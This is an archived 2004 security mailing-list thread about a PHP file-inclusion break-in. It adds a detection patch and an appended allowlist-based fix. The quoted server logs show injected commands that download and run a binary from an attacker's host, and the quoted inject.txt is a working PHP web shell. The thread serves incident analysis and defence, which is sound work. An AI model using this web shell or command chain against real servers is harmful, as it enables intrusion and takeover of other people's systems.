Re: Hack attempt
From: nathan c. dickerson (nathan_at_pro.net)
Date: 07/24/04
- Previous message: Alex Derkach: "Re: Hack attempt"
- In reply to: Norbert Crettol: "Hack attempt"
- Next in thread: Jan.Albrecht_at_bertelsmann.de: "RE: Hack attempt"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Fri, 23 Jul 2004 23:18:40 -0700
To: Norbert Crettol <norbert.crettol@idiap.ch>
Hi Norbert,
I dealt with the exact same intrusion technique on one of the webservers
here two weeks ago. They managed to get in and launch a perl based IRC
bot which was essentially a remote shell. This raised the CPU, which
shows up in our server monitoring software, and I managed to detect and
stop it before they got root. I had the temp directories set to
non-executable, and had some firewall settings so they needed to use a
script interpreted callback technique to really get access. (binary
executables wouldn't work with the nonexec temp directories).
It was also a file injection. After a while trying to figure out how they
were getting in (120+ websites on the machine), I found where they were
attacking, and patched the file with:
<?php
// Relies on register_globals being on: $bodyfile is filled in from the
// request, which is exactly the mechanism the attacker abuses.
if (!$bodyfile) {
    $bodyfile = "default"; // change to default body file.
}
else {
    // strstr() returns false when "://" is absent, so test for that explicitly.
    $ret = strstr($bodyfile, "://");
    if ($ret !== false) {
        echo "Send your message telling them to go away here :)";
        // Dump the request environment (remote address, query string, ...)
        $message = print_r($_SERVER, true);
        mail("your@email.com", "Exploit attempt detected",
             $message);
        exit();
    }
}
?>
An attacker can inject files via php's https:// ftp:// http:// streams.
This detection stops the attack, prints them a message, and dumps all the
server variables in an email.
They were more annoying than anything, so I thought it would be fun to
send them a little message upon attack.
It is quite possible to have it execute a suid program to modify your
iptables to automatically ban further connections from their address.
It's just a neat way to express your annoyance, while gaining some
information on the attacker.
The attackers I dealt with were looking to deface the websites, and I
managed to track them down (on the web and irc) to a defacement group
out of Brazil, including some home DSL ips, which probably were their
real addresses.
Norbert Crettol wrote:
>Hi all.
>
>This is my first post here. I'm Norbert Crettol, one of the sysadmins
>of Idiap, a research center in Switzerland (www.idiap.ch).
>
>We've had an undesired visitor, last night, that I discovered in the
>reports of tripwire.
>
>Here are the logs we got (we get a remote copy of the web server logs
>in another host). As of the second line, I've stripped the head and
>the tail of the line which is always the same.
>--- begin ---
>"GET /<some script>.php?bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=id HTTP/1.0" 200 6625 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
>bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=uname%20-a
>bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=wget
>bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=/sbin/ifconfig%20-a
>bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/;ls%20-la
>bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;ls%20-la
>bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;wget%20bosscalvin.com/bind2080
>bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;chmod%20755%20bind2080
>bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;./bind2080
>--- end ---
>I've seen no other
>
>It looks like bind8080 has created a directory /var/lock/.tmp
>and expanded an (owned by the web server owner) archive there. Here
>is the list of the files :
> 3225 jui 20 03:53 c-leet
> 15 jui 20 03:47 c-leet.dir
> 51 jui 20 03:47 cron.d
> 512 mai 12 2002 doc/
> 14 jui 21 16:27 eggdrop -> eggdrop-1.6.10*
> 2523568 mai 12 2002 eggdrop-1.6.10*
> 512 mai 12 2002 filesys/
> 343 fév 11 03:55 ****
> 512 mai 12 2002 help/
> 21149 nov 4 2003 kik*
> 1024 jui 21 11:00 language/
> 512 mai 12 2002 logs/
> 6 jui 20 03:48 pid.CaEm-
> 23065 jan 29 15:00 proc*
> 6 jui 20 03:48 psybnc.pid
> 28591 mai 12 2002 README
> 89 jui 20 03:53 run*
> 588 avr 1 10:00 run-*
> 708 avr 1 10:00 run--*
> 512 mar 31 08:12 scripts/
> 512 mai 12 2002 text/
> 2523568 mar 28 01:41 vi*
> 30293 nov 17 2002 xhide*
> 182 jui 20 03:47 y2kupdate*
>
>Here is the content of http://www.bosscalvin.com/inject.txt :
>--- begin ---
><font color="red">
><br><font face="Comic Sans MS" size="2"><center>
><b>CMD</b> - System Command<br><br></center></font><font face="Verdana" size="1"></center><br>
><b>#</b> CMD PHP : <br>
><b>#</b> Released by : <b>SecurityCorp</b><br>
><b>#</b> Edited by CaEm
><br>
><br>
><hr color="red" width=751px height=115px>
><br>
><pre><font face="Verdana" size="1">
><?
> // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
> if (isset($chdir)) @chdir($chdir);
> ob_start();
> system("$cmd 1> /tmp/nobody 2>&1; cat /tmp/nobody; rm -rf /tmp/nobody");
> $output = ob_get_contents();
> ob_end_clean();
> if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
>?>
></font></pre>
><br>
><hr color="red" width=751px height=115px>
><br>
><font face="Comic Sans MS" size="1"><b>« CaEm » </b><br><b>@ </b><b> îrç.Ðå£.ñët <i>#Renjana</i></b><br>
>--- end ---
>
>Has someone seen this kind of attack? (chkrootkit doesn't detect it).
>Has someone heard of this www.bosscalvin.com (or www.calvinmumu.org)?
>Is there a way to stop this guy? His nickname (CaEm) appears in the
>uploaded scripts.
>
>Norbert
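The `strstr($bodyfile, "://")` check above is a blocklist: it catches the `http://` and `ftp://` injections in Norbert's logs, but it still relies on register_globals and it only recognises schemes spelled with `//`. The following is an added example, not code from either poster, showing the allowlist approach a sysadmin would use to close the hole rather than just detect it: read the parameter explicitly, accept only a bare file name, resolve it inside a fixed directory with realpath(), and log anything else for review. It assumes PHP 8 (for str_contains/str_starts_with), legitimate body files living in a `bodies/` directory next to the script, and a `default` body file; all of those names are assumptions.

```php
<?php
// Added example (not from the thread): allowlist-based handling of the
// "bodyfile" parameter that the quoted attack abused. Directory layout,
// file names and the report format are assumptions for illustration.
declare(strict_types=1);

const BODY_DIR     = __DIR__ . '/bodies';  // assumed home of legitimate body files
const DEFAULT_BODY = 'default';            // assumed default body file name

/**
 * Classify a raw bodyfile value. Returns:
 *   'ok'      - a bare name that may be resolved inside BODY_DIR
 *   'remote'  - carries a URL scheme (http:, ftp:, php:, data:, ...); the
 *               file-injection case from the logs, caught by the scheme
 *               prefix rather than by looking for "://"
 *   'invalid' - path separators, "..", NUL bytes or other unexpected characters
 */
function classify_bodyfile(string $value): string
{
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $value) === 1) {
        return 'remote';
    }
    if (str_contains($value, "\0") || str_contains($value, '..')
        || str_contains($value, '/') || str_contains($value, '\\')) {
        return 'invalid';
    }
    // Allow a small character set instead of blocklisting bad substrings.
    return preg_match('/^[A-Za-z0-9_-]{1,64}$/', $value) === 1 ? 'ok' : 'invalid';
}

/**
 * Resolve a vetted name to a real path inside BODY_DIR, or null if no such
 * file exists there. realpath() collapses symlinks and "../" components so
 * the containment check below is made on the final on-disk path.
 */
function resolve_bodyfile(string $name): ?string
{
    $base = realpath(BODY_DIR);
    $path = realpath(BODY_DIR . '/' . $name . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    return str_starts_with($path, $base . DIRECTORY_SEPARATOR) ? $path : null;
}

/**
 * Record a rejected request for the sysadmin. error_log() writes to the web
 * server's error log, which is what off-host log copies and nightly review
 * (as in Norbert's setup) already pick up; nothing is sent back to the client.
 */
function report_attempt(string $kind, string $value): void
{
    $line = sprintf('[%s] bodyfile %s rejected: %s from %s uri=%s',
        date('c'), $kind, $value,
        $_SERVER['REMOTE_ADDR'] ?? '-', $_SERVER['REQUEST_URI'] ?? '-');
    error_log($line);
}

// Request handling: read the parameter explicitly, never via register_globals.
$raw  = $_GET['bodyfile'] ?? DEFAULT_BODY;
$kind = classify_bodyfile($raw);
if ($kind !== 'ok') {
    report_attempt($kind, $raw);
    http_response_code(400);
    exit;
}

// Fall back to the default body if the requested name is not on disk.
$path = resolve_bodyfile($raw) ?? resolve_bodyfile(DEFAULT_BODY);
if ($path === null) {
    http_response_code(500);
    exit;
}
include $path;
```

Against the logged requests, `classify_bodyfile('http://www.bosscalvin.com/inject.txt?')` returns `'remote'` and the request is logged and refused before any include happens; the `cmd=` parameter is never consulted at all. The containment check in `resolve_bodyfile()` means that even a name which passes the character filter can only ever load a file that really sits under `bodies/`, so the fix does not depend on spotting every possible bad substring.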